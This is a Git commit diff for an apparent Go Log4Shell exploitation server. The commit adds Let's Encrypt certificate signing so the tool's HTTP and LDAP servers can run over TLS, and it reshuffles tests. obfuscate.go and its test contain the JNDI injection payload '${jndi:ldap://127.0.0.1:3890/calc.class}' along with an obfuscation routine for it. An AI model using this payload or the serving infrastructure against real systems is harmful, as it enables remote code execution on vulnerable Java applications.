add autocert for sign certificate by Let's Encrypt.

Author: For-ACGN

autocert.go

@@ -1,27 +1,31 @@
 package log4shell
 
 import (
-	"fmt"
+	"crypto/tls"
+	"os"
 
+	"github.com/pkg/errors"
 	"golang.org/x/crypto/acme/autocert"
 )
 
-func testAutoCert() {
-
-	listener := autocert.NewListener("")
-
-	mgr := autocert.Manager{}
-	mgr.TLSConfig()
-
-	conn, err := listener.Accept()
-	fmt.Println(err)
-
-	buf := make([]byte, 4096)
-	n, err := conn.Read(buf)
-	fmt.Println("asdasdads", err)
-	fmt.Println(string(buf[:n]))
-
-	fmt.Println(conn.RemoteAddr())
-
-	// m:= autocert.Manager{}
+func TestAutoCert(domain string) (*tls.Certificate, error) {
+	const certDir = "autocert"
+
+	err := os.MkdirAll(certDir, 0700)
+	if err != nil {
+		return nil, errors.WithStack(err)
+	}
+	mgr := autocert.Manager{
+		Prompt:     autocert.AcceptTOS,
+		HostPolicy: autocert.HostWhitelist(domain),
+		Cache:      autocert.DirCache(certDir),
+	}
+	clientHello := tls.ClientHelloInfo{
+		ServerName: domain,
+	}
+	tlsCert, err := mgr.GetCertificate(&clientHello)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to sign certificate")
+	}
+	return tlsCert, nil
 }

autocert_test.go

@@ -1 +1,64 @@
 package log4shell
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net/http"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+	"golang.org/x/crypto/acme/autocert"
+)
+
+func TestNewListener(t *testing.T) {
+	const testDomain = "test"
+
+	mux := http.NewServeMux()
+	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintf(w, "Hello, TLS user! Your config: %+v", r.TLS)
+	})
+	server := http.Server{}
+	server.Handler = mux
+	go func() {
+
+		http.DefaultClient.Transport = &http.Transport{}
+
+		listener := autocert.NewListener(testDomain)
+		conn, err := listener.Accept()
+		require.NoError(t, err)
+
+		buf := make([]byte, 4096)
+		n, err := conn.Read(buf)
+		fmt.Println("asdasdads", err)
+		fmt.Println(string(buf[:n]))
+
+		fmt.Println(conn.RemoteAddr())
+
+		// log.Fatal(server.Serve(autocert.NewListener("example.com")))
+	}()
+
+	cfg := tls.Config{
+		ServerName: testDomain,
+	}
+
+	client := http.Client{
+		Transport: &http.Transport{
+			TLSClientConfig: &cfg,
+		},
+	}
+
+	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:443/", nil)
+	require.NoError(t, err)
+	req.Host = testDomain
+
+	resp, err := client.Do(req)
+	require.NoError(t, err)
+
+	fmt.Println(resp.StatusCode)
+
+	// conn, err := tls.Dial("tcp", "127.0.0.1:443", &cfg)
+	// require.NoError(t, err)
+	//
+	// _, err = conn.Write([]byte{1, 2, 3, 4})
+	// require.NoError(t, err)
+}

cmd/main.go

@@ -1,7 +1,6 @@
 package main
 
 import (
-	"crypto/tls"
 	"flag"
 	"fmt"
 	"log"
@@ -59,8 +58,13 @@ func main() {
 	}
 	// load tls certificate
 	if cfg.EnableTLS {
-		cfg.TLSCert, err = tls.LoadX509KeyPair(crt, key)
+		tlsCert, err := log4shell.TestAutoCert(cfg.Hostname)
 		checkError(err)
+		cfg.TLSCert = *tlsCert
+		fmt.Println("Let's Encrypt sign certificate successfully")
+
+		// cfg.TLSCert, err = tls.LoadX509KeyPair(crt, key)
+		// checkError(err)
 	}
 	cfg.LogOut = os.Stdout
 

log4shell.go

@@ -165,8 +165,14 @@ func (srv *Server) Start() error {
 		return err
 	case <-time.After(250 * time.Millisecond):
 	}
-	srv.logger.Println("[info]", "start http server", srv.httpListener.Addr())
-	srv.logger.Println("[info]", "start ldap server", srv.ldapListener.Addr())
+
+	if srv.enableTLS {
+		srv.logger.Println("[info]", "start https server", srv.httpListener.Addr())
+		srv.logger.Println("[info]", "start ldaps server", srv.ldapListener.Addr())
+	} else {
+		srv.logger.Println("[info]", "start http server", srv.httpListener.Addr())
+		srv.logger.Println("[info]", "start ldap server", srv.ldapListener.Addr())
+	}
 	srv.logger.Println("[info]", "start log4shell server successfully")
 	return nil
 }

obfuscate.go

@@ -6,6 +6,14 @@ import (
 )
 
 // TODO output generated string
+// var obf string
+//	flag.StringVar(&obf, "obf", "", "")
+//	flag.Parse()
+//
+//	if obf != "" {
+//		fmt.Println(log4shell.Obfuscate(obf))
+//		os.Exit(0)
+//	}
 
 // raw: ${jndi:ldap://127.0.0.1:3890/calc.class}
 //

obfuscate_test.go

@@ -1,69 +1,11 @@
 package log4shell
 
 import (
-	"crypto/tls"
 	"fmt"
-	"net/http"
 	"testing"
-
-	"github.com/stretchr/testify/require"
-	"golang.org/x/crypto/acme/autocert"
 )
 
 func TestObfuscate(t *testing.T) {
 	obfuscated := Obfuscate("${jndi:ldap://127.0.0.1:3890/calc.class}")
 	fmt.Println(obfuscated)
 }
-
-func TestNewListener(t *testing.T) {
-	const testDomain = "test"
-
-	mux := http.NewServeMux()
-	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
-		fmt.Fprintf(w, "Hello, TLS user! Your config: %+v", r.TLS)
-	})
-	server := http.Server{}
-	server.Handler = mux
-	go func() {
-
-		http.DefaultClient.Transport = &http.Transport{}
-
-		listener := autocert.NewListener(testDomain)
-		conn, err := listener.Accept()
-		require.NoError(t, err)
-
-		buf := make([]byte, 4096)
-		n, err := conn.Read(buf)
-		fmt.Println("asdasdads", err)
-		fmt.Println(string(buf[:n]))
-
-		fmt.Println(conn.RemoteAddr())
-
-		// log.Fatal(server.Serve(autocert.NewListener("example.com")))
-	}()
-
-	cfg := tls.Config{
-		ServerName: testDomain,
-	}
-
-	client := http.Client{
-		Transport: &http.Transport{
-			TLSClientConfig: &cfg,
-		},
-	}
-
-	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:443/", nil)
-	require.NoError(t, err)
-	req.Host = testDomain
-
-	resp, err := client.Do(req)
-	require.NoError(t, err)
-
-	fmt.Println(resp.StatusCode)
-
-	// conn, err := tls.Dial("tcp", "127.0.0.1:443", &cfg)
-	// require.NoError(t, err)
-	//
-	// _, err = conn.Write([]byte{1, 2, 3, 4})
-	// require.NoError(t, err)
-}